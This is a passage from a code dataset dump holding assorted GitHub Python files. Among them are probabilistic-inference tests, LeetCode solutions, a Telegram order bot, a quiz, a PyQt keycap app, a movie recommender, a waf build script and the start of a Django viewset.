**kwargs):\n            return torch.ones_like(torch.as_tensor(theta, dtype=torch.float32))\n\n        def allow_iid_x(self) -> bool:\n            return True\n\n    prior = MultivariateNormal(zeros(num_dim), eye(num_dim))\n    potential_fn = FakePotential(prior=prior)\n    theta_transform = torch_tf.identity_transform\n\n    posterior = VIPosterior(potential_fn, prior, theta_transform=theta_transform, q=q)\n    posterior_copy = deepcopy(posterior)\n    posterior.set_default_x(torch.tensor(np.zeros((num_dim,)).astype(np.float32)))\n    assert posterior._x != posterior_copy._x, \"Mhh, something with the copy is strange\"\n    posterior_copy = deepcopy(posterior)\n    assert (\n        posterior._x == posterior_copy._x\n    ).all(), \"Mhh, something with the copy is strange\"\n\n    # Produces nonleaf tensors in the cache... -> Can lead to failure of deepcopy.\n    posterior.q.rsample()\n    posterior_copy = deepcopy(posterior)\n\n\ndef test_vi_posterior_interface():\n    num_dim = 2\n\n    class FakePotential(BasePotential):\n        def __call__(self, theta, **kwargs):\n            return torch.ones_like(torch.as_tensor(theta[:, 0], dtype=torch.float32))\n\n        def allow_iid_x(self) -> bool:\n            return True\n\n    prior = MultivariateNormal(zeros(num_dim), eye(num_dim))\n    potential_fn = FakePotential(prior=prior)\n    theta_transform = torch_tf.identity_transform\n\n    posterior = VIPosterior(potential_fn, theta_transform=theta_transform)\n    posterior.set_default_x(torch.zeros((1, num_dim)))\n\n    posterior2 = VIPosterior(potential_fn)\n\n    # Raising errors if untrained\n    assert isinstance(\n        posterior.q.support, type(posterior2.q.support)\n    ), \"The support indicated by 'theta_transform' is different than that of the 'prior'.\"\n\n    with pytest.raises(Exception) as execinfo:\n        posterior.sample()\n\n    assert (\n        \"The variational posterior was not fit\" in execinfo.value.args[0]\n    ), \"An expected error was raised but the error message is different than expected...\"\n\n    with pytest.raises(Exception) as execinfo:\n        posterior.log_prob(prior.sample())\n\n    assert (\n        \"The variational posterior was not fit\" in execinfo.value.args[0]\n    ), \"An expected error was raised but the error message is different than expected...\"\n\n    # Passing hyperparameters in train\n    posterior.train(max_num_iters=20)\n\n    posterior.train(max_num_iters=20, optimizer=torch.optim.SGD)\n    assert isinstance(\n        posterior._optimizer._optimizer, torch.optim.SGD\n    ), \"Changing the optimizer base class did not work\"\n    posterior.train(max_num_iters=20, stick_the_landing=True)\n\n    assert (\n        posterior._optimizer.stick_the_landing\n    ), \"The stick_the_landing argument is not correctly passed.\"\n\n    posterior.vi_method = \"alpha\"\n    posterior.train(max_num_iters=20)\n    posterior.train(max_num_iters=20, alpha=0.9)\n\n    assert (\n        posterior._optimizer.alpha == 0.9\n    ), \"The hyperparameter alpha is not passed to the corresponding optimizer\"\n\n    posterior.vi_method = \"IW\"\n    posterior.train(max_num_iters=20)\n    posterior.train(max_num_iters=20, K=32)\n\n    assert (\n        posterior._optimizer.K == 32\n    ), \"The hyperparameter K is not passed to the corresponding optimizer\"\n\n    # Passing hyperparameters in sample\n    posterior.sample()\n    posterior.sample(method=\"sir\")\n    posterior.sample(method=\"sir\", K=128)\n\n    # Testing evaluate\n    posterior.evaluate()\n    posterior.evaluate(\"prop\")\n    posterior.evaluate(\"prop_prior\")\n\n    # Test log_prob and potential\n    posterior.log_prob(posterior.sample())\n    posterior.potential(posterior.sample())\n\n\ndef test_vi_with_multiple_independent_prior():\n    prior = MultipleIndependent(\n        [\n            
Gamma(torch.tensor([1.0]), torch.tensor([0.5])),\n Beta(torch.tensor([2.0]), torch.tensor([2.0])),\n ],\n validate_args=False,\n )\n\n def simulator(theta):\n return Binomial(probs=theta[:, 1]).sample().reshape(-1, 1)\n\n num_simulations = 100\n theta = prior.sample((num_simulations,))\n x = simulator(theta)\n\n trainer = SNLE(prior)\n nle = trainer.append_simulations(theta, x).train()\n potential, transform = likelihood_estimator_based_potential(nle, prior, x[0])\n posterior = VIPosterior(\n potential,\n prior=prior, # type: ignore\n theta_transform=transform,\n )\n posterior.set_default_x(x[0])\n posterior.train()\n\n posterior.sample(sample_shape=(10,), show_progress_bars=False)\n","repo_name":"amortizedgbi/amortizedgbi","sub_path":"packages/sbi/tests/vi_test.py","file_name":"vi_test.py","file_ext":"py","file_size_in_byte":11026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36337153676","text":"\"\"\"\nGiven a set of candidate numbers (candidates) (without duplicates) and a target number (target), \nfind all unique combinations in candidates where the candidate numbers sums to target.\nEg. \nInput: candidates = [2,3,6,7], target = 7,\nA solution set is:\n[\n [7],\n [2,2,3]\n]\n\"\"\"\nclass Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n self.res = []\n candidates.sort()\n self.recur_num(0,candidates, target,[])\n return self.res\n \n def recur_num(self,index,candidates,target,cur_sol):\n if target == 0:\n self.res.append(cur_sol)\n return\n if index == len(candidates) or target < 0: \n return\n if target > 0:\n self.recur_num(index,candidates,target-candidates[index],cur_sol+[candidates[index]])\n self.recur_num(index+1,candidates,target,cur_sol) ","repo_name":"CheRayLiu/LeetCode","sub_path":"medium/combination_sum.py","file_name":"combination_sum.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40846922601","text":"#! python3\n\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n m, n = len(s) + 1, len(p) + 1\n dp = [[False] * n for _ in range(2)]\n dp[0][0] = True\n \n for j in range(1, n):\n if p[j-1] == '*':\n dp[0][j] = dp[0][j-1]\n \n col = 0; #前一行\n for i in range(1, m):\n dp[col^1] = [False] * n\n for j in range(1, n):\n if p[j-1] == '?' 
or p[j-1] == s[i-1]:\n dp[col^1][j] = dp[col][j-1]\n elif p[j-1] == '*':\n dp[col^1][j] = dp[col][j] or dp[col][j-1] or dp[col^1][j-1]\n col ^= 1\n \n return dp[col][n-1]\n\nif __name__ == \"__main__\":\n print(Solution().isMatch(\"cb\", \"?a\"))\n print(Solution().isMatch(\"adceb\", \"*a*b\"))","repo_name":"Aden-Tao/LeetCode","sub_path":"0044 Wildcard Matching/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10345892170","text":"from aiogram import types\r\nfrom aiogram.dispatcher import FSMContext\r\n\r\nfrom loader import dp, bot,db\r\nfrom states.states import buyrtma\r\nfrom keyboards.default.menu import Buyurtma, tasdiq,buyurtma\r\n\r\n@dp.message_handler(text='📥 Buyurtma yaratish')\r\nasync def select_category(message: types.Message):\r\n await message.answer(f\"Ro'yxatdan kategoriyalarni tanlang\",reply_markup=Buyurtma)\r\n await buyrtma.project_name.set()\r\n\r\n@dp.message_handler(state=buyrtma.project_name)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n project_name = message.text\r\n await state.update_data({'name': project_name})\r\n await message.answer('Proyektning qisqacha nomini yozing.\\n\\nMisol uchun: Telegram bot, mebellar katalogi')\r\n await buyrtma.next()\r\n\r\n\r\n@dp.message_handler(state=buyrtma.qisqacha_nomi)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n qisqacha = message.text\r\n\r\n await state.update_data({'qisqacha': qisqacha})\r\n\r\n await message.answer('Proyektning qisqacha nomini, proyektning funksionalligini va qancha vaqt ichida proyektni bajarish mumkinligini yozing.')\r\n\r\n await buyrtma.next()\r\n\r\n\r\n@dp.message_handler(state=buyrtma.project_narxi)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n project_narxi = message.text\r\n\r\n await state.update_data({'project_narxi': project_narxi})\r\n\r\n await message.answer('Proyektning narxini kiriting')\r\n\r\n await buyrtma.next()\r\n\r\n\r\n@dp.message_handler(state=buyrtma.phonenum)\r\nasync def select_category(message: types.Message, state=FSMContext):\r\n num = message.text\r\n\r\n await state.update_data({'phone': num})\r\n\r\n data = await state.get_data()\r\n project_name = data.get(\"name\")\r\n project_nomi = data.get(\"qisqacha\")\r\n project_tarfi= data.get('project_narxi')\r\n project_narxi = data.get(\"phone\")\r\n\r\n msg = f'Kategoriya: {project_name}\\n\\n'\r\n msg += f'Proyektning nomi: {project_nomi}\\n\\n'\r\n msg += f\"Proyektning ta'rifi: {project_tarfi}\\n\\n\"\r\n msg += f'Proyektning narxi: {project_narxi} sum\\n\\n'\r\n\r\n msgss = f'Quyidagi ma`lumotlar qabul qilindi: \\n\\n '\r\n msgs = f'Kategoriya: {project_name}\\n\\n'\r\n msgs += f'Proyektning nomi: {project_nomi}\\n\\n'\r\n msgs += f\"Proyektning ta'rifi: {project_tarfi}\\n\\n\"\r\n msgs += f'Proyektning narxi: {project_narxi} sum\\n\\n'\r\n\r\n msgs += f\"Frilanserlar sizning buyurtmangizni ko'rishi uchun, ✅ Tasdiqlash tugmasini bosib buyurtmangizni tasdiqlang!\"\r\n\r\n global user\r\n user = f\"{msg}\"\r\n await message.answer(msgss)\r\n await message.answer(msgs, reply_markup=tasdiq)\r\n\r\n\r\n await state.finish()\r\n\r\n\r\n\r\n@dp.message_handler(text='✅ Tasdiqlash')\r\nasync def select_tasdiq(message: types.Message):\r\n try:\r\n user_id = message.from_user.id\r\n db.zakaz_qoshish(zakaz=user,\r\n tg_id=user_id)\r\n except Exception as xatolik:\r\n print(xatolik)\r\n\r\n await 
bot.send_message(1625900856, user)\r\n\r\n    await message.answer(\"Buyurtmanigiz bazaga sahlandi, tez orada frilanserlar siz bilan bot orqali bog'lanadi.\",reply_markup=buyurtma)\r\n\r\n\r\n@dp.message_handler(text='❌ Bekor qilish')\r\nasync def select_rad(message: types.Message):\r\n    await message.answer(\"❌ Bekor qilindi...\",reply_markup=buyurtma)","repo_name":"Gayratoff/Kwork","sub_path":"handlers/users/zakaz.py","file_name":"zakaz.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"31206624344","text":"from random import shuffle\ngkquiz = [\n['What is the most famous song in 2020?',\n {'answer':'c','option':'a.Despacito\\nb.closer\\nc.shape of you\\nd.Roses'}\n ],\n['what is the best-known anime series in 2020?',\n {'answer':'a','option':'a.Pokemon\\nb.Naruto\\nc.Attack on Titan\\nd.Great Pretender'}\n ],\n['what is the most popular movie in 2020?',\n {'answer': 'b','option':'a.Parasite\\nb.The Dark Knight\\nc.Roma\\nd.Beanpole'}\n ],\n]\n\nindex = 0\nscore = 0\noptnum = 0\ntotal=10\nj=\"\"\nwhile len(gkquiz)>0:\n    data = gkquiz[0]\n    j = data[0]\n    data = data[1]\n    answer = data['answer']\n    option = data['option']\n\n    print(j)\n    print(option)\n\n    while True:\n        user_answer = input(\"Please enter your answer here : \").lower()\n        if user_answer == 'a' or user_answer == 'b' or user_answer == 'c' or user_answer == 'd':\n            if user_answer == answer:\n                print(\"Good work\")\n                score += 1\n                print(\"Your score is\",score)\n            else:\n                print(\"The answer is wrong, the right answer is\",answer)\n                print(\"Your score is\",score)\n\n            del gkquiz[0]\n            break\n        else:\n            print(\"Enter your answer as a, b, c or d\")\n\nprint(\"\")\nexit()\n","repo_name":"Mohammed1000000000000000000/gk-quiz-19050","sub_path":"Qushtens and score _v3.py","file_name":"Qushtens and score _v3.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"29151682164","text":"# https://www.techbeamers.com/python-programming-questions-list-tuple-dictionary/\n\n# Dictionaries\n\na = {(1,2):1,(2,3):2}\nprint(a[1,2]) # answer:1\n\n\n# a = {'a':1,'b':2,'c':3}\n# print (a['a','b']) # KeyError: ('a', 'b')\n\n\n\n'''\nfruit = {}\n\ndef addone(index):\n    if index in fruit:\n        fruit[index] += 1\n    else:\n        fruit[index] = 1\n\naddone('Apple')\naddone('Banana')\naddone('apple')\naddone('Neembu')\nprint(len(fruit)) # answer:4 -- 'Apple', 'Banana', 'apple' and 'Neembu' are four distinct keys\n'''\n\n\n'''\narr = {}\narr[1] = 1\narr['1'] = 2\narr[1] += 1\n\nsum = 0\nfor k in arr:\n    sum += arr[k]\n\nprint (sum) # answer:4\n'''\n\n\nmy_dict = {}\nmy_dict[1] = 1\nmy_dict['1'] = 2\nmy_dict[1]= 4\n\nsum = 0\nfor k in my_dict:\n    sum += my_dict[k]\n\nprint(sum) # answer:6\n\n\n\n\n'''\n\nmy_dict = {}\nmy_dict[(1,2,4)] = 8\nmy_dict[(4,2,1)] = 10\nmy_dict[(1,2)] = 12\n\nsum = 0\nfor k in my_dict:\n    sum += my_dict[k]\n\nprint (sum)\nprint(my_dict)\n\nanswer:30\n{(1, 2, 4): 8, (4, 2, 1): 10, (1, 2): 12}\n'''\n\n\n\n'''\nbox = {}\njars = {}\ncrates = {}\nbox['biscuit'] = 1\nbox['cake'] = 3\njars['jam'] = 4\ncrates['box'] = box\ncrates['jars'] = jars\nprint(len(crates[box]))\n\nanswer: TypeError: unhashable type: 'dict'\n'''\n\n'''\ndict = {'c': 97, 'a': 96, 'b': 98}\n\nfor _ in sorted(dict):\n    print (dict[_])\n\nanswer:96 98 97\n'''\n\n\n\n'''\nrec = {\"Name\" : \"Python\", \"Age\":\"20\"}\nr = rec.copy()\nprint(id(r) == id(rec))\n\nanswer: for id it's False\n        for type it's True\n'''\n\n\n\n'''\nrec = {\"Name\" : \"Python\", 
\"Age\":\"20\", \"Addr\" : \"NJ\", \"Country\" : \"USA\"}\nid1 = id(rec)\ndel rec\nrec = {\"Name\" : \"Python\", \"Age\":\"20\", \"Addr\" : \"NJ\", \"Country\" : \"USA\"}\nid2 = id(rec)\nprint(id1 == id2)\n\n\nanswer:True\n'''\n\n","repo_name":"rajeshsvv/Lenovo_Back","sub_path":"1 PYTHON/9 PYTHON PROGRAMS/PYTHON PROGRAMS NOUS/Techbeamers/ds dict techbeam3.py","file_name":"ds dict techbeam3.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23798961584","text":"import time\nimport random\nfrom multiprocessing import Process, Pipe\n\nclass P1(Process):\n def __init__(self, pipe):\n self.pipe = pipe\n super(P1, self).__init__()\n\n # Overwrite method run\n def run(self):\n # P1 sends message\n print('P1 sends...')\n for i in range(3):\n time.sleep(random.randint(1,2))\n self.pipe.send(i)\n print('send: P1 -> %s' % i)\n\nclass P2(Process):\n def __init__(self, pipe):\n self.pipe = pipe\n super(P2, self).__init__()\n\n # Overwrite method run\n def run(self):\n # P2 receives\n print('P2 receives')\n for i in range(3):\n i = self.pipe.recv()\n print('recv: P2 -> %s' % i)\n \n # P2 sends...\n print('P2 sends...')\n for i in range(3):\n time.sleep(random.randint(1,2))\n self.pipe.send(i)\n print('Send: P2 -> %s' % i)\n\nif __name__ == \"__main__\":\n pp1, pp2 = Pipe()\n p1, p2 = P1(pp1), P2(pp2)\n\n p1.start()\n p2.start()\n\n p1.join()\n p2.join()\n","repo_name":"carreymu/pylab","sub_path":"demos/multiProcess/pipeAndMultiProcess.py","file_name":"pipeAndMultiProcess.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20941595097","text":"from PyQt5 import QtWidgets\r\nfrom controller.build import BuildApp, add_part, clear_parts, search_parts, exit_app\r\nfrom controller.stats import MainStatsWidget\r\nfrom model.collaborative_filter import keycap_factorization\r\nfrom model.content_filter import similar_keycap\r\nfrom model.message import add_limit, confirm_restart, is_selected, open_file\r\nfrom model.read_csv import Keycap\r\nfrom model.read_csv import open_csv\r\nfrom view import keycap\r\n\r\n\r\n# The keycap window controller\r\n# The table is populated with keycap data\r\nclass KeycapApp(keycap.Ui_Form, QtWidgets.QWidget):\r\n\r\n def __init__(self):\r\n super(KeycapApp, self).__init__()\r\n self.setupUi(self)\r\n self.build = BuildApp()\r\n self.stats = MainStatsWidget()\r\n self.pushButton.clicked.connect(self.add_part)\r\n self.pushButton_2.clicked.connect(self.show_build)\r\n self.pushButton_3.clicked.connect(self.start_over)\r\n self.pushButton_4.clicked.connect(exit_app)\r\n self.pushButton_5.clicked.connect(self.show_stats)\r\n self.pushButton_6.clicked.connect(self.open_file)\r\n\r\n # Add selected part to build table\r\n def add_part(self):\r\n temp = []\r\n name = ''\r\n selected_keycap = []\r\n\r\n # If a row is selected, clear selection from other table\r\n if self.tableWidget.selectionModel().hasSelection():\r\n self.tableWidget_2.clearSelection()\r\n selected_keycap = self.tableWidget.selectedItems()\r\n if self.tableWidget_2.selectionModel().hasSelection():\r\n self.tableWidget.clearSelection()\r\n selected_keycap = self.tableWidget_2.selectedItems()\r\n\r\n # Alert user if a row has not been selected from either tables\r\n if not self.tableWidget.selectionModel().hasSelection() and not self.tableWidget_2.selectionModel().hasSelection():\r\n is_selected()\r\n 
return\r\n\r\n # Add keycaps if no keycaps exist in the build table\r\n if not search_parts('Keycap'):\r\n for index, i in enumerate(selected_keycap):\r\n if index == 0:\r\n temp.append('N/A')\r\n if index >= 1:\r\n name += i.text() + '/'\r\n if index == 3:\r\n name += i.text()\r\n temp.append(name)\r\n if index == 4:\r\n continue\r\n if index >= 5:\r\n temp.append(i.text())\r\n add_part(temp)\r\n # Warning message if adding more than 1 item of the same type\r\n else:\r\n add_limit()\r\n return\r\n self.close()\r\n self.build.load_table()\r\n self.build.showMaximized()\r\n\r\n # Show build window\r\n def show_build(self):\r\n self.build.load_table()\r\n self.build.showMaximized()\r\n\r\n # Show Data Visualization Window\r\n def show_stats(self):\r\n self.stats.plot_knn()\r\n self.stats.plot_tfidf()\r\n self.stats.plot_svd()\r\n self.stats.showMaximized()\r\n\r\n # Close the keycap window and clear the build table\r\n def start_over(self):\r\n if confirm_restart():\r\n self.close()\r\n clear_parts()\r\n else:\r\n return\r\n\r\n # Open CSV file of current window\r\n def open_file(self):\r\n if open_file():\r\n self.close()\r\n open_csv('keycap.csv')\r\n clear_parts()\r\n else:\r\n return\r\n\r\n # Populate keycap table\r\n def load_table(self):\r\n keycaps = Keycap().load_keycap()\r\n row = 0\r\n self.tableWidget.setRowCount(len(keycaps))\r\n\r\n for i in keycaps:\r\n self.tableWidget.setItem(row, 0, QtWidgets.QTableWidgetItem(i[0]))\r\n self.tableWidget.setItem(row, 1, QtWidgets.QTableWidgetItem(i[1]))\r\n self.tableWidget.setItem(row, 2, QtWidgets.QTableWidgetItem(i[2]))\r\n self.tableWidget.setItem(row, 3, QtWidgets.QTableWidgetItem(i[3]))\r\n self.tableWidget.setItem(row, 4, QtWidgets.QTableWidgetItem(i[4]))\r\n self.tableWidget.setItem(row, 5, QtWidgets.QTableWidgetItem(i[5]))\r\n self.tableWidget.setItem(row, 6, QtWidgets.QTableWidgetItem(i[6]))\r\n self.tableWidget.setItem(row, 7, QtWidgets.QTableWidgetItem(i[7]))\r\n self.tableWidget.resizeColumnsToContents()\r\n self.tableWidget.resizeRowsToContents()\r\n row += 1\r\n self.tableWidget.clearSelection()\r\n\r\n # Populate keycap table\r\n def load_table2(self):\r\n keycaps = keycap_factorization(similar_keycap())\r\n row = 0\r\n self.tableWidget_2.setRowCount(len(keycaps))\r\n\r\n for i in keycaps:\r\n self.tableWidget_2.setItem(row, 0, QtWidgets.QTableWidgetItem(i[0]))\r\n self.tableWidget_2.setItem(row, 1, QtWidgets.QTableWidgetItem(i[1]))\r\n self.tableWidget_2.setItem(row, 2, QtWidgets.QTableWidgetItem(i[2]))\r\n self.tableWidget_2.setItem(row, 3, QtWidgets.QTableWidgetItem(i[3]))\r\n self.tableWidget_2.setItem(row, 4, QtWidgets.QTableWidgetItem(i[4]))\r\n self.tableWidget_2.setItem(row, 5, QtWidgets.QTableWidgetItem(i[5]))\r\n self.tableWidget_2.setItem(row, 6, QtWidgets.QTableWidgetItem(i[6]))\r\n self.tableWidget_2.setItem(row, 7, QtWidgets.QTableWidgetItem(i[7]))\r\n self.tableWidget_2.resizeColumnsToContents()\r\n self.tableWidget_2.resizeRowsToContents()\r\n row += 1\r\n self.tableWidget_2.clearSelection()\r\n","repo_name":"AudreyGH/Hybrid-Recommender-System","sub_path":"controller/keycap.py","file_name":"keycap.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29887752312","text":"def solution(s, n):\n answer = ''\n lower = \"abcdefghijklmnopqrstuvwxyz\"\n upper = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n s=\" \".join(s.split(\" \"))\n # 공백 중복 제거\n\n for i in s:\n if i.islower(): #소문자일때\n sIndex = lower.find(i)\n returnIndex = 
sIndex+n\n if returnIndex >= 26:\n returnIndex -= 26\n answer += str(lower[returnIndex])\n elif i.isupper(): #대문자 일때\n sIndex = upper.find(i)\n returnIndex = sIndex+n\n if returnIndex >= 26:\n returnIndex -= 26\n answer += str(upper[returnIndex])\n elif i == \" \":\n answer += \" \"\n\n return answer\n\ns = \"a B z\"\nn = 4\nprint(solution(s,n))\n\n\n\nlower = \"abcdefghijklmnopqrstuvwxyz\"\nupper = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n# 알스웨트가이 파이썬 프로젝트 #6 카이사르 암호와 같은 내용\n\n#ord(문자) 아스키로 반환\n#chr(숫자) 해당 문자로 반환\n\n#소문자 및 대문자 문자열이 넘어갈 경우 다시 처음부터 시작할 대응 마련해야함\n\n\n# 1방법 : 문자열 대응 방법\n# string.find(), string.index()\nplus = 1\ns1= \"z\"\nsIndex = lower.find(s1)\n\n# print(lower[lower.find(\"z\")+plus]) #오류 발생 인덱스 값 범위 벗어남\n\nreturnIndex = sIndex+plus\n\nif returnIndex >= 26:\n returnIndex -= 26\n# 인덱스 범위가 벗어날 경우 해결 방안\n\nprint(lower[returnIndex])\n\n# 2방법 아스키 코드 변환 방법\n","repo_name":"pillow12360/Programmers_for_Coding_Test","sub_path":"dong_chan/level1/24.시저암호.py","file_name":"24.시저암호.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"41554336171","text":"import json\nimport os\nimport pytest\n\nfrom tsukuyomi.presentation_layer.data_model import ScoringItem\n\n\n@pytest.fixture(scope=\"module\")\ndef short_preprocessed_dummy_item():\n \"\"\"provides a short preprocessed dummy text\"\"\"\n\n SHORT_DUMMY = os.path.join(os.path.dirname(os.path.abspath(\"__file__\")), \"tests/test_data/short_feature_dummy.json\")\n\n dummy_dict = json.load(open(SHORT_DUMMY, 'r'))\n dummy_item = ScoringItem(published=dummy_dict['published'],\n platform=dummy_dict['platform'],\n author=dummy_dict['author'],\n url=dummy_dict['url'],\n title=dummy_dict['title'],\n text=dummy_dict['text'],\n clean=dummy_dict['clean'])\n return dummy_item\n\n\n@pytest.fixture(scope=\"module\")\ndef long_preprocessed_dummy_item():\n \"\"\"provides a long preprocessed dummy text\"\"\"\n\n LONG_DUMMY = os.path.join(os.path.dirname(os.path.abspath(\"__file__\")), \"tests/test_data/long_feature_dummy.json\")\n\n dummy_dict = json.load(open(LONG_DUMMY, 'r'))\n dummy_item = ScoringItem(published=dummy_dict['published'],\n platform=dummy_dict['platform'],\n author=dummy_dict['author'],\n url=dummy_dict['url'],\n title=dummy_dict['title'],\n text=dummy_dict['text'],\n clean=dummy_dict['clean'])\n return dummy_item","repo_name":"WallaceSchwein/mugen_tsukuyomi","sub_path":"tests/fixtures/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29285576916","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport difflib\n\ndef title_from_index(index):\n return movie[movie.index == index][\"title\"].values[0]\n\ndef index_from_title(title):\n title_list = movie['title'].tolist()\n common = difflib.get_close_matches(title, title_list, 1)\n titlesim = common[0]\n return movie[movie.title == titlesim][\"index\"].values[0]\n\nmovie = pd.read_csv(\"moviedata.csv\")\nfeatures = ['keywords','cast','genres','director','tagline']\nfor feature in features:\n movie[feature] = movie[feature].fillna('')\n\ndef combine_features(row):\n try:\n return row['keywords'] +\" \"+row['cast']+\" \"+row['genres']+\" \"+row['director']+\" \"+row['tagline']\n except:\n print (\"Error:\", row)\n\nmovie[\"combined_features\"] = 
movie.apply(combine_features,axis=1)\n\ncv = CountVectorizer()\ncount_matrix = cv.fit_transform(movie[\"combined_features\"])\ncosine_sim = cosine_similarity(count_matrix) \n\nuser_movie = input(\"Enter movie of your choice:\\t\")\nmovie_index = index_from_title(user_movie)\n\nsimilar_movies = list(enumerate(cosine_sim[movie_index]))\nsimilar_movies_sorted = sorted(similar_movies,key=lambda x:x[1],reverse=True)\ni=0\nprint(\"\\nOther movies you might be interested in:-\\n\")\nfor rec_movie in similar_movies_sorted:\n if(i!=0):\n print (i,\") \",title_from_index(rec_movie[0]),sep=\"\")\n i=i+1\n if i>50:\n break","repo_name":"Jeetchakraborty/Movie-recomdation","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10669348592","text":"#!/usr/bin/python\n\ndef set_options(opt):\n\tprint('\\nSetting build options & flags...')\n\t# We tell Waf we need a C++ compiler\n\topt.tool_options('compiler_cxx')\n\ndef init():\n\tprint('Initializing WAF build system...')\n\t\n\ndef configure(conf):\n\tprint('Configuring the build enviroment...')\n\t\n\tconf.check_tool('compiler_cxx')\n\tconf.check_cfg\t(package='gtkmm-2.4',at_least_version='2.0.0',args='--cflags --libs',uselib_store='GTKMM')\n\tconf.check_cfg\t(package='jack',at_least_version='1.0.0',args='--cflags --libs',uselib_store='JACK')\n\ndef build(bld):\n\tprint('Building the sources to objects...')\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cstaticlib',\n\t\tsource\t\t= 'automationwidget.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'GTKMM',\n\t\ttarget\t\t= 'automationwidget',\n\t\texport_dirs\t= '.'\t)\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cstaticlib',\n\t\tsource\t\t= 'automationtrack.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'GTKMM JACK',\n\t\tuselib_local= 'automationwidget',\n\t\ttarget\t\t= 'automationtrack',\n\t\texport_dirs\t= '.'\t)\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cstaticlib',\n\t\tsource\t\t= 'jack.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'JACK GTKMM',\n\t\ttarget\t\t= 'myjack',\n\t\texport_dirs\t= '.'\t)\n\t\n\tbld.new_task_gen(\n\t\tfeatures\t= 'cxx cprogram',\n\t\tsource\t\t= 'main.cpp',\n\t\tincludes\t= '/usr/include',\n\t\tuselib\t\t= 'GTKMM',\n\t\tuselib_local= 'automationtrack myjack',\n\t\ttarget\t\t= 'test.out'\t)\n\ndef shutdown():\n\t# this function can be used to copy files to the build directory.\n\t# its a little advanced, but if your using Images or other files\n\t# in your program, its worth knowing.\n\t\n\timport os\n\timport shutil\n\t\n\tif os.path.isdir(os.path.join(os.getcwd(),'build/default')):\n\t\ttry:\n\t\t\tshutil.copy2('automate.glade','build/default/automate.glade')\n\t\t\tprint('Copying new resouces...')\n\t\texcept:\n\t\t\tprint('Copying failed. 
Acces denied?')\n\t\n\tprint('shutting down')\n\n","repo_name":"harryhaaren/AutoMate","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"6621727108","text":"from dateutil.parser import parse\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom rest_framework import permissions, views, viewsets, exceptions, status\nfrom rest_framework.decorators import detail_route\nfrom rest_framework.response import Response\n\nfrom acidatabase import models as aci_models\nfrom acidatabase import serializers\nfrom acidatabase.mixins import DataTableViewSetMixin\n\n\nUser = get_user_model()\n\n\nclass IncidentViewSet(DataTableViewSetMixin, viewsets.ModelViewSet):\n queryset = aci_models.Incident.objects.active()\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = serializers.IncidentSerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n # Separate list view\n def get_serializer_class(self):\n if self.is_list:\n return serializers.IncidentListSerializer\n return serializers.IncidentSerializer\n\n def transform_ordering(self, ordering):\n ordering_str = ordering\n ordering = ordering.split(',')\n if 'long_id' in ordering_str:\n ordering = self.set_id_ordering(ordering)\n for name in ('status', 'origin'):\n if name in ordering_str:\n ordering = self.set_priority_ordering(ordering, name)\n return [name.strip() for name in ordering]\n\n def set_id_ordering(self, ordering, prefix=''):\n name = prefix + 'long_id'\n if name in ordering:\n index = ordering.index(name)\n ordering[index] = prefix + 'id_prefix'\n ordering.insert(index + 1, prefix + 'dj_id')\n return ordering\n return self.set_id_ordering(ordering, prefix='-')\n\n def set_priority_ordering(self, ordering, name, prefix=''):\n full_name = prefix + name\n if full_name in ordering:\n index = ordering.index(full_name)\n ordering[index] = \"{}{}_priority\".format(prefix, name)\n return ordering\n return self.set_priority_ordering(ordering, name, prefix='-')\n\n @detail_route(methods=['put', 'get'], url_path='finish-merge/(?P[0-9]+)')\n def finish_merge(self, *args, **kwargs):\n \"\"\" Remove secondary case after merging 